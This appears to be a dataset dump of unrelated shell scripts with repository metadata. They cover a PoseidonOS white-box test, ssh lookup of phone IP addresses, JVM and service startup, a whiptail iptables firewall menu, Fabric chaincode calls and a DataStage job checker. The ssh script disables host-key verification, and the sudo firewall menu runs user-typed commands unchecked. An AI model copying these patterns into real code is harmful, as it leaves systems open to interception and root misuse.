#sudo ${ROOT_DIR}/test/system/longterm/setup_ibofos.sh create ${arraymode} ${totalsize} ${volcnt} ${ip}
${ROOT_DIR}/test/system/io_path/setup_ibofos_nvmf_volume.sh -a ${ip}
echo ------------[setup Done]-------------------------------------------
echo -------------------------------------------------------------------
echo ------------[Map WBT CMDs]-------------------------------------------
volname="vol1"
volsize=21474836480
echo -[Map : get_map_layout]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt get_map_layout --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : read_vsamap]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt read_vsamap --name vol1 --output VSAMap_vol1.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : write_vsamap]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt write_vsamap --name vol1 --input VSAMap_vol1.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : read_vsamap_entry]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt read_vsamap_entry --name $volname --rba 0 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : write_vsamap_entry]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt write_vsamap_entry --name $volname --rba 0 --vsid 1 --offset 1 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : read_stripemap]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt read_stripemap --output StripeMap.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : write_stripemap]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt write_stripemap --input StripeMap.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : read_stripemap_entry]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt read_stripemap_entry --vsid 0 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : write_stripemap_entry]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt write_stripemap_entry --vsid 0 --loc 1 --lsid 123 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : read_whole_reverse_map]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt read_whole_reverse_map --output ReverseMapWhole.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : write_whole_reverse_map]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt write_whole_reverse_map --input ReverseMapWhole.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : read_reverse_map]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt read_reverse_map --vsid 0 --output ReverseMap_vsid0.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : write_reverse_map]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt write_reverse_map --vsid 0 --input ReverseMap_vsid0.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : read_reverse_map_entry]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt read_reverse_map_entry --vsid 0 --offset 0 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : write_reverse_map_entry]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt write_reverse_map_entry --vsid 0 --offset 0 --rba 0 --name vol1 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : get_bitmap_layout]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt get_bitmap_layout --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : get_instant_meta_info]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt get_instant_meta_info --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : get_wb_lsid_bitmap]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt get_wb_lsid_bitmap --output wbLsidBitmap.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : set_wb_lsid_bitmap]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt set_wb_lsid_bitmap --input wbLsidBitmap.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : get_active_stripe_tail]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt get_active_stripe_tail --output activeStripeTail.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : set_active_stripe_tail]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt set_active_stripe_tail --input activeStripeTail.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : get_current_ssd_lsid]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt get_current_ssd_lsid --output currentSsdLsid.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : set_current_ssd_lsid]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt set_current_ssd_lsid --input currentSsdLsid.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : get_user_segment_bitmap]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt get_user_segment_bitmap --output segmentBitmap.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : set_user_segment_bitmap]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt set_user_segment_bitmap --input segmentBitmap.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : get_segment_info]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt get_segment_info --output segmentInfo.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : set_segment_info]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt set_segment_info --input segmentInfo.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : get_segment_valid_count]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt get_segment_valid_count --output segValidCount.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -------------[User Data IO WBT CMDs]------------------------------------
MAXCOUNT=3
count=0
lbaIdx=0
lbaCnt=0
while [ "$count" -le $MAXCOUNT ] # ($MAXCOUNT) 개의 랜덤 정수 발생.
do
lbaIdx=$RANDOM
let "lbaIdx %= 1024*8"
lbaCnt=$RANDOM
let "lbaCnt %= 1024"
echo -[IO Path : unvme-ns-${count} : wbt write_raw]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt write_raw --dev unvme-ns-${count} --lba ${lbaIdx} --count ${lbaCnt} --pattern 0xdeadbeef --output segValidCount.bin --json-res > ${cliOutput}
check_result
if [[ "$ip" =~ "$VM_IP_RANGE_1" ]] || [[ "$ip" =~ "$VM_IP_RANGE_2" ]]; then
echo -[IO Path : unvme-ns-${count} : wbt write_uncorrectable_lba]------------------------------------------
echo -[ wbt write_uncorrectable_lba is not supported at VM Test ]------------------------------------------
else
echo -[IO Path : unvme-ns-${count} : wbt write_uncorrectable_lba]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt write_uncorrectable_lba --dev unvme-ns-${count} --lba ${lbaIdx} --output segValidCount.bin --json-res > ${cliOutput}
check_result
fi
echo -[IO Path : unvme-ns-${count} : wbt flush]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt flush --output segValidCount.bin --json-res > ${cliOutput} --array $ARRAYNAME
check_result
echo -[IO Path : unvme-ns-${count} : wbt read_raw]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt read_raw --dev unvme-ns-${count} --lba ${lbaIdx} --count ${lbaCnt} --output dump.bin --output segValidCount.bin --json-res > ${cliOutput}
if [[ "$ip" =~ "$VM_IP_RANGE_1" ]] || [[ "$ip" =~ "$VM_IP_RANGE_2" ]]; then
check_result
else
check_result_expected_fail
fi
let "count += 1" # 카운터 증가.
done
echo --------------------------------------------------------------------
echo ------------[MetaFs WBT CMDs]------------------------------------------
echo --------------------------------------------------------------------
echo -[MetaFs : mfs_create_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_create_file --name $fileName1 --size $fileSize1 --integrity 0 --access 2 --operation 2 --volume 0 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_open_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_open_file --name ${fileName1} --volume 0 --array $ARRAYNAME --json-res > ${cliOutput}
cat ${cliOutput} | jq ".Response.result.data.returnCode" > result.txt
fileDesc1=$(<result.txt)
check_result
echo -[MetaFs : mfs_create_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_create_file --name $fileName2 --size $fileSize2 --integrity 0 --access 2 --operation 2 --volume 0 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_open_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_open_file --name $fileName2 --volume 0 --array $ARRAYNAME --json-res > ${cliOutput}
cat ${cliOutput} | jq ".Response.result.data.returnCode" > result.txt
fileDesc2=$(<result.txt)
check_result
echo -[MetaFs : mfs_write_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_write_file --fd $fileDesc1 --volume 0 --offset $fileOffset1 --count $dataLength1 --input $inputFile --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_read_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_read_file --fd $fileDesc1 --volume 0 --offset $fileOffset1 --count $dataLength1 --output mfs_read_one.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_write_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_write_file --fd $fileDesc2 --volume 0 --offset $fileOffset2 --count $dataLength2 --input $inputFile --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_read_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_read_file --fd $fileDesc2 --volume 0 --offset $fileOffset2 --count $dataLength2 --output mfs_read_two.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_get_file_size]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_get_file_size --fd $fileDesc1 --volume 0 --array $ARRAYNAME --json-res > ${cliOutput}
cat ${cliOutput} | jq ".Response.result.data.returnCode" > result.txt
fileSize=$(<result.txt)
check_result
echo -[MetaFs : mfs_get_aligned_file_io_size]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_get_aligned_file_io_size --fd $fileDesc1 --volume 0 --array $ARRAYNAME --json-res > ${cliOutput}
cat ${cliOutput} | jq ".Response.result.data.returnCode" > result.txt
AlignedFileIoSize=$(<result.txt)
check_result
echo -------------------------------------------------------
echo fileDesc1 = ${fileDesc1} fileDesc2 = ${fileDesc2}
echo fileSize = ${fileSize} AlignedFileIOSize = ${AlignedFileIoSize}
echo -------------------------------------------------------
echo -[MetaFs : mfs_dump_files_list]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_dump_files_list --output $FilesInfoOutput --volume 0 --array $ARRAYNAME --json-res > ${cliOutput}
echo ------- [opend files] ---------------------------------
sed 's/},{/\n /g' ../filesInfo.json > result.txt
cat ${scriptPath}/result.txt
echo -------------------------------------------------------
check_result
echo -[MetaFs : mfs_dump_inode_info]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_dump_inode_info --name $fileName1 --volume 0 --output $InodeOutput --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_dump_inode_info]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_dump_inode_info --name $fileName2 --volume 0 --output $InodeOutput --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_write_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_write_file --fd $fileDesc1 --volume 0 --offset $fileOffset1 --count $dataLength1 --input $inputFile --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_read_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_read_file --fd $fileDesc1 --volume 0 --offset $fileOffset1 --count $dataLength1 --output mfs_read_one.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_write_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_write_file --fd $fileDesc2 --volume 0 --offset $fileOffset2 --count $dataLength2 --input $inputFile --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_read_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_read_file --fd $fileDesc2 --volume 0 --offset $fileOffset2 --count $dataLength2 --output mfs_read_two.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_close_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_close_file --fd ${fileDesc1} --volume 0 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_close_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_close_file --fd ${fileDesc2} --volume 0 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_setup_meta_fio_test]------------------------------------------
# create 1GB sized volume
${BIN_DIR}/poseidonos-cli volume create -v MetaFsTestVol0 --size 1073741824 --maxiops 0 --maxbw 0 -a $ARRAYNAME
check_result
# mount the volume
${BIN_DIR}/poseidonos-cli volume mount -v MetaFsTestVol0 -a $ARRAYNAME
check_result
# check interface for mesuring metafs performance
${BIN_DIR}/poseidonos-cli wbt mfs_setup_meta_fio_test --name MetaFsTestVol --size 0
check_result
# unmount the volume
${BIN_DIR}/poseidonos-cli volume unmount -v MetaFsTestVol0 -a $ARRAYNAME --force
check_result
echo ------- [Created files] ------------
echo fileDesc1 = ${fileDesc1} fileDesc2 = ${fileDesc2} have closed
sed 's/},{/\n /g' $FilesInfoOutput > result.txt
cat ${scriptPath}/result.txt
echo ----------------------------------
rm -rf result.txt
rm -rf ${inputFile}
rm -rf ${cliOutput}
echo "------------[WBT Test End, Close poseidonos]----------------------------------"
${BIN_DIR}/poseidonos-cli array unmount --array-name $ARRAYNAME --force
${BIN_DIR}/poseidonos-cli system stop --force
if [ $exit_result -eq 0 ]; then
echo -[ Test Success] -
else
echo -[ Test Fail] -
fi
exit $exit_result
| true
|
8264541dec6fc8045bead8c9590ca38192fa29b8
|
Shell
|
kudumi/scripts
|
/phone/ipv4-address-of-phone.sh
|
UTF-8
| 746
| 4.0625
| 4
|
[] |
no_license
|
#!/bin/bash
net_id="-i $HOME/.ssh/hq_rsa"
net_opts="-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no"
function help_and_quit() {
cat <<EOF
Usage: ${0##*/} [-i private_key] target_ips
--id
-d specify the private key file used to login as
admin on the target phones
EOF
exit $help_exit
}
while [[ $1 == *-* ]]; do # Parse arguments
case $1 in
-i|--id )
net_id="-i $2"
shift ;;
-h|--help )
help_and_quit ;;
* ) echo "$1 is not a recognized flag." ;;
esac
shift
done
for target in $*; do
result=`ssh -q ${net_id} ${net_opts} admin@${target} "ifconfig | grep 'inet addr' | grep -v 127.0.0.1 | cut -d':' -f2 | cut -d' ' -f1"`;
echo "${target} is ${result}"
done
| true
|
50b3be3a2e787c3b571e72c2d09704512ca984e8
|
Shell
|
jacobke/etrace
|
/etrace-stream/stream-container/script/env.sh
|
UTF-8
| 1,269
| 3.21875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
SCRIPT_DIR=$(dirname ${BASH_SOURCE[0]})
BASE_DIR=$(cd ${SCRIPT_DIR} && pwd -P)
JVM_CONF="${BASE_DIR}/../conf/jvm_conf.sh"
if [ ! -f "${JVM_CONF}" ]; then
echo "${JVM_CONF} doesn't exist!!! exit"
sleep 5
exit 0
fi
cd "$SCRIPT_DIR/.."
source "${JVM_CONF}"
JVM_LOGS_DIR=${BASE_DIR}/../logs/${STREAM_HTTP_PORT}
GC_LOGS_DIR=${JVM_LOGS_DIR}/gc
DUMP_LOGS_DIR=${JVM_LOGS_DIR}/dump
if [ ! -d "${GC_LOGS_DIR}" ]; then
mkdir -p "${GC_LOGS_DIR}"
fi
if [ ! -d "${DUMP_LOGS_DIR}" ]; then
mkdir -p "${DUMP_LOGS_DIR}"
fi
# set jvm startup argument
JAVA_OPTS="-Xms${CONTAINER_JVM_XMS} \
-Xmx${CONTAINER_JVM_XMX} \
-XX:+UseCompressedOops \
-XX:+ExplicitGCInvokesConcurrent \
-XX:+UseG1GC \
-Djava.awt.headless=true \
-Dstream.http.port=${STREAM_HTTP_PORT}
-Dstream.logs.path=${JVM_LOGS_DIR}
-Dfile.encoding=utf-8 \
-XX:+PrintGC \
-XX:+PrintGCDetails \
-XX:+PrintGCDateStamps \
-Xloggc:${GC_LOGS_DIR}/server.gc.$(date +%Y%m%d-%H%M%S).log \
-XX:-OmitStackTraceInFastThrow \
-XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=${DUMP_LOGS_DIR} \
"
export JAVA_OPTS=${JAVA_OPTS}
| true
|
b74a21135998fe0bbd05f4eff6e949973fb2f2ba
|
Shell
|
jinyalin/Myproject
|
/linux-script/startup.sh
|
UTF-8
| 492
| 3.390625
| 3
|
[] |
no_license
|
#!/bin/sh
program="com.hskj.thread.MainSever"
deploypath="/hskj/Deliver32Send"
pid=$(ps -ef| grep "$program" | grep -v grep|awk '{print $2}')
datetime=$(date +'%Y %m %d %H:%M:%S')
cd $deploypath
if [ -n "$pid" ];then
echo "$program is already running"
else
if [ -f nohup.out ];then
rm -f nohup.out
fi
touch nohup.out && chmod o+r nohup.out
nohup java -Xms1024m -Xmx2048m -Djava.ext.dirs=lib -cp . $program &>nohup.out &
echo "$datetime $program start" >> restart.log
fi
| true
|
385da93249cdb3dd235db5f8ad2ac818a40d66cc
|
Shell
|
luoguohui234/cello
|
/src/agent/docker/_compose_files/fabric-1.0/scripts/notaryinfo_put.sh
|
UTF-8
| 1,805
| 2.578125
| 3
|
[
"CC-BY-4.0",
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# Copyright O Corp. All Rights Reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
# Importing useful functions for cc testing
if [ -f ./func.sh ]; then
source ./func.sh
elif [ -f scripts/func.sh ]; then
source scripts/func.sh
fi
CC_NAME="notaryinfo"
#CC_02_INVOKE_ARGS='{"Args":["invoke","a","b","10"]}'
#CC_INVOKE_ARGS=${CC_02_INVOKE_ARGS}
echo_g "=== Testing Chaincode put ==="
#Invoke on chaincode on Peer0/Org1
echo_b "Sending invoke transaction (transfer 10) on org1/peer0..."
chaincodeInvoke ${APP_CHANNEL} 1 0 ${CC_NAME} '{"Args":["put","a","aaazzzzxxxx","b","vvvzzzzxxxx","c","aaazzxxxx"]}'
#Invoke on chaincode on Peer0/Org2
echo_b "Sending invoke transaction (transfer 10) on org1/peer0..."
chaincodeInvoke ${APP_CHANNEL} 2 0 ${CC_NAME} '{"Args":["put","a","ddzzzxxxxx","d","ddddddddzzzxx","b","bbbbzzxxxx"]}'
#Invoke on chaincode on Peer0/Org3
echo_b "Sending invoke transaction (transfer 10) on org1/peer0..."
chaincodeInvoke ${APP_CHANNEL} 3 0 ${CC_NAME} '{"Args":["put","c","cccczzzxxx"]}'
#Invoke on chaincode on Peer0/Org4
echo_b "Sending invoke transaction on org2/peer3..."
chaincodeInvoke ${APP_CHANNEL} 4 0 ${CC_NAME} '{"Args":["put","b","bbbbzzzxxxx","d","ddddddzzzxxxxxx"]}'
chaincodeQuery ${APP_CHANNEL} 3 0 ${CC_NAME} '{"Args":["queryHistory","c"]}'
chaincodeQuery ${APP_CHANNEL} 4 0 ${CC_NAME} '{"Args":["queryHistory","a"]}'
chaincodeQuery ${APP_CHANNEL} 1 0 ${CC_NAME} '{"Args":["queryHistory","a"]}'
#for((i=1;i<=5000;i++));
#do
# chaincodeInvoke ${APP_CHANNEL} 1 0 ${CC_NAME} '{"Args":["put","a","aaazzzzxxxx","b","vvvzzzzxxxx","c","aaazzxxxx"]}'
# chaincodeInvoke ${APP_CHANNEL} 1 0 ${CC_NAME} '{"Args":["put","a","aaccvxxxx","b","vvvzzcvcvx","c","aacvxvxx"]}'
# sleep 0.01
#done
echo_g "=== Chaincode invoke/query completed ==="
echo
| true
|
5b64ae030ad4366b38781eedc355218eb355e29d
|
Shell
|
bkhadka2/Cyber-Security-Projects
|
/Firewall-Rule-Shell-Code/firewall.sh
|
UTF-8
| 9,882
| 3.6875
| 4
|
[] |
no_license
|
#!/usr/bin/sudo bash
function mainMenu {
option=$(whiptail --title "IPTABLES FIREWALL" --menu "Choose an option" 15 65 8 \
"1:" "Display Firewall Rules" \
"2:" "Add Rules Manually" \
"3:" "Choose Rules" \
"4:" "Delete Firewall Rules" \
"5:" "Display All rules in HTML page" \
"6:" "Quit" 3>&1 1>&2 2>&3)
status=$?
if [[ $option == "1:" ]]; then
choice=$(whiptail --title "IPTABLES FIREWALL Rules" --menu "Choose an option" 15 65 8 \
"a:" "INPUT Rules" \
"b:" "OUTPUT Rules" \
"c:" "FORWARD Rules" \
"d:" "Display All Rules" \
"e:" "Go To Main Menu" 3>&1 1>&2 2>&3)
if [[ $choice == "a:" ]]; then
displayINPUT
optionForDifferentRules
elif [[ $choice == "b:" ]]; then
displayOUTPUT
optionForDifferentRules
elif [[ $choice == "c:" ]]; then
displayFORWARD
optionForDifferentRules
elif [[ $choice == "d:" ]]; then
displayAllRules
optionForDifferentRules
else
mainMenu
fi
elif [[ $option == "2:" ]]; then
optionForAddingRules
elif [[ $option == "3:" ]]; then
builtInFirewallOptions
elif [[ $option == "4:" ]]; then
optionForDeletingRules
elif [[ $option == "5:" ]]; then
htmlFile > fwall.html
username=$(whiptail --inputbox "Type in your Username For Computer" 8 78 --title "Username Box" 3>&1 1>&2 2>&3)
sudo su $username firefox fwall.html
mainMenu
elif [[ $status = 1 ]]; then
exit 0;
else
exit 0
fi
}
function displayINPUT {
a=$(sudo iptables -L INPUT --line-numbers)
whiptail --title "INPUT Firewall Rules" --msgbox "Listed are the INPUT rules:\n $a" 20 78
}
function displayOUTPUT {
a=$(sudo iptables -L OUTPUT --line-numbers)
whiptail --title "OUTPUT Firewall Rules" --msgbox "Listed are the OUTPUT rules:\n $a" 20 78
}
function displayFORWARD {
a=$(sudo iptables -L FORWARD --line-numbers)
whiptail --title "FORWARD Firewall Rules" --msgbox "Listed are the FORWARD rules:\n $a" 20 78
}
function displayAllRules {
a=$(sudo iptables -L --line-numbers)
whiptail --title "FORWARD Firewall Rules" --msgbox "Listed are the Firewall rules:\n $a" 35 90
}
function optionForAddingRules {
command=$(whiptail --inputbox "Type in the command" 8 78 --title "Command Box" 3>&1 1>&2 2>&3)
status=$?
if [[ $command == "" ]]; then
whiptail --title "Messsage box" --msgbox "NO Rule added! Empty provided!! " 20 78
elif [[ $status = 1 ]]; then
whiptail --title "Messsage box" --msgbox "No Rule provided to add " 20 78
else
error=$(echo $command | grep -i "Bad argument") || $(echo $command | grep -i "command not found")
errorStatus=$?
if [[ $errorStatus = 1 ]]; then
whiptail --title "Messsage box" --msgbox "No Such Rule exist " 20 78
else
whiptail --title "Messsage box" --msgbox "$command INPUT rule added!! " 20 78
$command
fi
fi
optionForDifferentRules
mainMenu
}
function htmlFile {
TITLE=$(hostname)
a=$(sudo iptables -S INPUT)
b=$(sudo iptables -S OUTPUT)
c=$(sudo iptables -S FORWARD)
cat <<- _EOF_
<html>
<head>
<title>Firewall Rules $TITLE</title>
</head>
<body style="background-color:purple;">
<h1 style="color:white; text-align:center;">Firewall Rules: $TITLE</h1>
<br>
<br>
<br>
<h2 style="color:white; text-align:center;"> INPUT RULES: </h2>
<p style="text-align:center; font-size:28px;"> $a </p>
<h2 style="color:white; text-align:center;"> OUTPUT RULES: </h2>
<p style="text-align:center; font-size:28px;"> $b </p>
<h2 style="color:white; text-align:center;"> FORWARD RULES: </h2>
<p style="text-align:center; font-size:28px;"> $c </p>
</body>
</html>
_EOF_
}
function optionForDeletingRules {
op=$(whiptail --title "IPTABLES FIREWALL Rules" --menu "Choose an option" 15 65 8 \
"a:" "Delete INPUT Rules" \
"b:" "Delete OUTPUT Rules" \
"c:" "DELETE FORWARD Rules" \
"d:" "Go To Main Menu" 3>&1 1>&2 2>&3)
if [[ $op == "a:" ]]; then
displayINPUT
command=$(whiptail --inputbox "Type in the rule number to delete" 8 78 --title "Input Rule #" 3>&1 1>&2 2>&3)
status=$?
if [[ $status = 1 ]]; then
whiptail --title "Messsage box" --msgbox "No rule number provided " 20 78
else
whiptail --title "Messsage box" --msgbox "Rule # $command deleted from INPUT " 20 78
sudo iptables -D INPUT $command
fi
optionForDifferentRules
elif [[ $op == "b:" ]]; then
displayOUTPUT
command=$(whiptail --inputbox "Type in the rule number to delete" 8 78 --title "Input Rule #" 3>&1 1>&2 2>&3)
status=$?
if [[ $status = 1 ]]; then
whiptail --title "Messsage box" --msgbox "No rule number provided " 20 78
else
whiptail --title "Messsage box" --msgbox "Rule # $command deleted from OUPUT " 20 78
sudo iptables -D OUTPUT $command
fi
optionForDifferentRules
elif [[ $op == "c:" ]]; then
displayFORWARD
command=$(whiptail --inputbox "Type in the rule number to delete" 8 78 --title "Input Rule #" 3>&1 1>&2 2>&3)
status=$?
if [[ $status = 1 ]]; then
whiptail --title "Messsage box" --msgbox "No rule number provided " 20 78
else
whiptail --title "Messsage box" --msgbox "Rule # $command deleted from OUPUT " 20 78
sudo iptables -D FORWARD $command
fi
optionForDifferentRules
else
mainMenu
fi
}
function optionForDifferentRules {
response=$(whiptail --title "IPTABLES FIREWALL Rules" --menu "Choose an option" 15 65 8 \
"a:" "Add Rules" \
"b:" "Delete Rules" \
"c:" "Go to Main Menu" 3>&1 1>&2 2>&3)
if [[ $response == "a:" ]]; then
optionForAddingRules
elif [[ $response == "b:" ]]; then
optionForDeletingRules
else
mainMenu
fi
}
function builtInFirewallOptions {
options=$(whiptail --title "IPTABLES FIREWALL OPTIONS" --menu "Choose a firewall option" 15 65 8 \
"a:" "Block ping from an ipaddress" \
"b:" "Block any site EX: www.facebook.com" \
"c:" "Block specific MAC Address" \
"d:" "Block all TCP request" \
"e:" "Block ssh connections" \
"f:" "Block Outgoing SMTP mail" \
"g:" "Go to Main Menu" 3>&1 1>&2 2>&3)
if [[ $options == "a:" ]]; then
ip=$(whiptail --inputbox "Type IPADDRESS to block to ping" 8 78 --title "IP Box" 3>&1 1>&2 2>&3)
status=$?
if [[ $status = 1 ]]; then
whiptail --title "Messsage box" --msgbox "No IPADDRESS provided!! " 20 78
else
whiptail --title "Messsage box" --msgbox "IPADDRESS $ip is blocked to ping!! " 20 78
bashcommand=$(sudo iptables -A INPUT -s $ip -p icmp -j DROP)
fi
mainMenu
elif [[ $options == "b:" ]]; then
site=$(whiptail --inputbox "Type the URL of the site starting from WWW." 8 78 --title "URL Box" 3>&1 1>&2 2>&3)
ip=$(host $site)
whiptail --title "Copy the IP of the site" --msgbox "Copy the IP:\n $ip" 20 78
input=$(whiptail --inputbox "Paste IPADDRESS of the site" 8 78 --title "IP Box" 3>&1 1>&2 2>&3)
status=$?
if [[ $status = 1 ]]; then
whiptail --title "Messsage box" --msgbox "No IPADDRESS provided!! " 20 78
else
whiptail --title "Messsage box" --msgbox "IPADDRESS $input is blocked!! " 20 78
bashcommand=$(sudo iptables -A OUTPUT -p tcp -d $input -j DROP)
fi
mainMenu
elif [[ $options == "c:" ]]; then
input=$(whiptail --inputbox "Enter MAC address format=00:00:00:00:00:00" 8 78 --title "MAC Box" 3>&1 1>&2 2>&3)
status=$?
if [[ $status = 1 ]]; then
whiptail --title "Messsage box" --msgbox "No MAC address provided!! " 20 78
else
whiptail --title "Messsage box" --msgbox "MAC address $input is blocked!! " 20 78
bashcommand=$(sudo iptables -A INPUT -m mac --mac-source $input -j DROP)
fi
mainMenu
elif [[ $options == "d:" ]]; then
input=$(whiptail --inputbox "Enter IP address" 8 78 --title "IP Box" 3>&1 1>&2 2>&3)
status=$?
if [[ $status = 1 ]]; then
whiptail --title "Messsage box" --msgbox "No IPADDRESS provided!! " 20 78
else
whiptail --title "Messsage box" --msgbox "IP address $input is blocked from all TCP!! " 20 78
bashcommand=$(sudo iptables -A INPUT -p tcp -s $input -j DROP)
fi
mainMenu
elif [[ $options == "e:" ]]; then
input=$(whiptail --inputbox "Enter IP address" 8 78 --title "IP Box" 3>&1 1>&2 2>&3)
status=$?
if [[ $status = 1 ]]; then
whiptail --title "Messsage box" --msgbox "No IPADDRESS provided!! " 20 78
else
whiptail --title "Messsage box" --msgbox "SSH connections blocked from $input!! " 20 78
bashcommand=$(sudo iptables -A INPUT -p tcp --dport ssh -s $input -j DROP)
fi
mainMenu
elif [[ $options == "f:" ]]; then
sudo iptables -A OUTPUT -p tcp --dport 25 -j REJECT
whiptail --title "Messsage box" --msgbox "Port 25 is blocked for outgoing mail " 20 78
mainMenu
else
mainMenu
fi
}
mainMenu
| true
|
5f71042f02856a686707ce5f03a9c38b01307ca9
|
Shell
|
lix90/bm_etl_admin
|
/bk/check_jobstatus2.sh
|
UTF-8
| 976
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/sh
jobwaiting=`grep "Waiting for job..." $1`
endtime=`date +%Y%m%d_%H%M%S`
if [ "${jobwaiting}" != "Waiting for job..." ]; then
jobstatus=-1
else
jobstatus=1
fi
${binfiledirectory}/dsjob \
-server ${DSSERVER} \
-user ${DSUSER} \
-password ${DSPASSWORD} \
-jobinfo ${DSPROJECT} ${jobunit} \
>> $1
error=`grep "Job Status" $1`
error=${error##*\(}
error=${error%%\)*}
if [ "${jobstatus}" != "1" ]; then
jobstatus=-1
else
if [ "${error}" = "1" -o "${error}" = "2" ]; then
jobstatus=0
else
jobstatus=${error}
fi
if [ ! "${error}" = "1" ]; then
${binfiledirectory}/dsjob \
-server ${DSSERVER} \
-user ${DSUSER} \
-password ${DSPASSWORD} \
-logsum ${DSPROJECT} ${jobunit} \
>> $1
fi
fi
| true
